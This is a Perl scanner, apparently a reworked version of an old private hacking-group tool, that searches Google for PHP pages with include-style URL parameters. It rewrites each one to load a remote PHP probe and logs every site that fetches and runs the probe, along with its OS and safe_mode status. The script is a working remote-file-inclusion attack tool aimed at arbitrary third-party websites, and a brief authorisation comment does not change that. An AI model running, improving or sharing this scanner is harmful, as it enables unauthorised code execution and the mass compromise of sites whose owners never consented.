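#!/usr/bin/perl
# ================================================================ #
# google-php-include-bugs searcher v 0.8                           #
# (c)oded by drmist\STNC                                           #
# www.security-teams.net                                           #
#                                                                  #
# ATTENTION. THIS SCRIPT IS PRIVATE.                               #
# ONLY FOR STNC AND FRIENDS. NOT FOR SALE.                         #
#                                                                  #
# Usage: perl script.pl --log=<log-file> --url=<test-script-url>   #
# Test script:                                                     #
# <?php                                                            #
# error_reporting(0);                                              #
# $s = md5("STNC");                                                #
# $code = eregi("windows", php_uname())+                           #
#         2*eregi("apache", getenv("SERVER_SOFTWARE"))+            #
#         4*ini_get('safe_mode'); echo $s."[$code]".$s;            #
# ?>                                                               #
# ================================================================ #
#
# How it works: for every (parameter name, TLD, extension) triple the
# script asks Google for pages whose URL contains "<param>=", then
# rewrites each hit so that <param> points at the --url test script.
# A target that fetches and executes that remote file echoes
# md5("STNC") on both sides of a small bit-mask (bit0 = Windows,
# bit1 = Apache, bit2 = safe_mode); seeing the marker in the response
# is the "remote include works" signal, and the hit is appended to
# the --log file.
#
# NOTE(review): every probe makes a third-party host download and run
# code you supply. Use only against systems you are authorised to test.
# NOTE(review): the PHP probe relies on eregi() and safe_mode, both of
# which later PHP releases removed, and the Google scraping below is
# tied to the 2007-era result HTML and sends no User-Agent. Expect to
# rework both before reuse.
#
# Fixes vs. the posted version: strict/warnings; the host:port regex
# was mangled and never split a port; IO::Socket's option is "Timeout"
# (the old "TimeOut" with an undefined $timeout was ignored, so connects
# could hang); the log is opened once with a 3-arg open and a fatal
# error instead of a per-hit unchecked 2-arg open; "&amp;" in result
# HTML is unescaped before URL extraction; domain dedup uses a hash;
# the duplicated "be" TLD is dropped.

use strict;
use warnings;
use IO::Socket;
use IO::Handle;

# Parameter names commonly used for file includes, then the TLD and
# file-extension lists to enumerate (site:<tld> keeps each query small).
my @inc_bugs = qw(
    page text print html url view show body cat inc incl include read
    write data code fname filename cont content menu open file id p f
    seite pagina vista vue visao datei offnen corpo corps ouvrir fichier
    abrir fichero inhalt contenu conteudo
);
my @zones = qw(
    com net org de fr uk br am info name aero biz edu ws in cn us be it
    cc tv ru su jp kz se is ca gs ms vg fi gov
);
my @ftypes = qw(php php3);

# md5("STNC") -- the marker the test script prints around [$code].
my $boundary = 'ca73bad132fa0c99fe9ce9efe9029e21';

# Connect and read timeout, in seconds, for every HTTP request.
my $TIMEOUT = 10;

# --log=<file> and --url=<test-script-url>; anything else is ignored.
my ($log, $script);
for my $arg (@ARGV) {
    if ($arg =~ /^--log=(.*)$/) {
        $log = $1;
    }
    elsif ($arg =~ /^--url=(.*)$/) {
        $script = $1;
    }
}
if (!($script && $log)) {
    usage();
    exit;
}

# Open the log once, up front, so an unwritable path fails before any
# scanning rather than silently dropping hits mid-run.
open my $log_fh, '>>', $log or die "cannot open log file '$log': $!";
$log_fh->autoflush(1);

my $count = 0;

foreach my $inc (@inc_bugs) {
    foreach my $zone (@zones) {
        foreach my $ftype (@ftypes) {
            my $query = "filetype:$ftype site:$zone inurl:$inc=";
            print "\n[$query]\n";

            # Percent-encode every character of the query for the URL.
            (my $request = $query) =~ s/(.)/sprintf("%%%02x", ord($1))/eg;

            my %seen;    # one probe per domain per query
            for my $page (0 .. 9) {
                my $start = $page * 100;
                my $html  = get("http://www.google.com/search?filter=0&num=100&start=$start&q=$request");

                # Anchors in HTML carry "&amp;" for "&"; the URL character
                # class below has no ";", so leaving it escaped truncated
                # every extracted URL at its first "&amp;".
                $html =~ s/&amp;/&/g;
                my @urls = $html =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi;

                foreach my $url (@urls) {
                    # Split the URL around "<param>=<value>": $left is
                    # everything before the parameter name, $right is
                    # everything after its value.
                    next unless $url =~ /\Q$inc\E=[^&]+/i;
                    my $left  = substr($url, 0, $-[0]);
                    my $right = substr($url, $+[0]);

                    # Skip Google's own cache links and google.com itself.
                    next if $url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i;
                    next if $url =~ /google\.com/i;

                    my ($domain) = $url =~ m{^http://([a-z0-9.\-]{5,})}i;
                    next unless defined $domain;
                    $domain =~ s/^www\.//i;
                    next if $seen{ lc $domain }++;

                    my $shown = "$left$inc=[INCLUDE]$right";

                    # Point the include parameter at the test script. The
                    # trailing "?" turns whatever followed the original
                    # value into a query string on the fetched file, so the
                    # target's own suffix (e.g. ".php") does not break the
                    # remote path. The target will execute $script.
                    my $probe = "$left$inc=$script?$right";
                    my ($code) = get($probe) =~ /$boundary\[([0-9]+)\]$boundary/i;

                    if (defined $code) {
                        # bit0 = Windows, bit2 = safe_mode (bit1, Apache,
                        # is not reported).
                        my $line = "$shown - "
                                 . ($code % 2 ? "WINDOWS" : "UNIX")
                                 . ($code > 3 ? ", SAFE_MODE" : "")
                                 . "\n";
                        $count++;
                        print "[$count] $line";
                        print {$log_fh} $line;
                    }
                    else {
                        print "$shown - no bugs\n";
                    }
                }
            }
        }
    }
}

close $log_fh or warn "closing log file '$log': $!";

# Minimal HTTP/1.0 GET of an http://host[:port]/path URL.
# Returns the raw response (headers included), or '' when the URL does
# not parse or the connection fails. Connect and read are both bounded
# by $TIMEOUT; on a read timeout whatever was received so far is
# returned, matching the old alarm-closes-socket behaviour.
sub get {
    my ($request) = @_;

    my ($server, $path) = $request =~ m{^http://([^/]+)/?(.*)$}
        or return '';

    my $port = 80;
    if ($server =~ /^([^:]+):([0-9]{2,5})$/) {
        ($server, $port) = ($1, $2);
    }

    my $sock = IO::Socket::INET->new(
        PeerAddr => $server,
        PeerPort => $port,
        Proto    => 'tcp',
        Type     => SOCK_STREAM,
        Timeout  => $TIMEOUT,
    ) or return '';

    my $data = '';
    eval {
        local $SIG{ALRM} = sub { die "timeout\n" };
        alarm $TIMEOUT;
        print {$sock} "GET /$path HTTP/1.0\r\nHost: $server\r\n\r\n";
        while (defined(my $chunk = <$sock>)) {
            $data .= $chunk;
        }
        alarm 0;
    };
    alarm 0;    # make sure no alarm survives a die inside the eval
    close $sock;

    return $data;
}

# Print command-line help plus the PHP test script the target must be
# able to fetch from --url. Text kept verbatim from the original.
sub usage {
    print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>
Test script:
<?php
error_reporting(0);
\$s = md5("STNC");
\$code = eregi("windows", php_uname())+2*eregi("apache", getenv("SERVER_SOFTWARE"))+4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;
?>
);
}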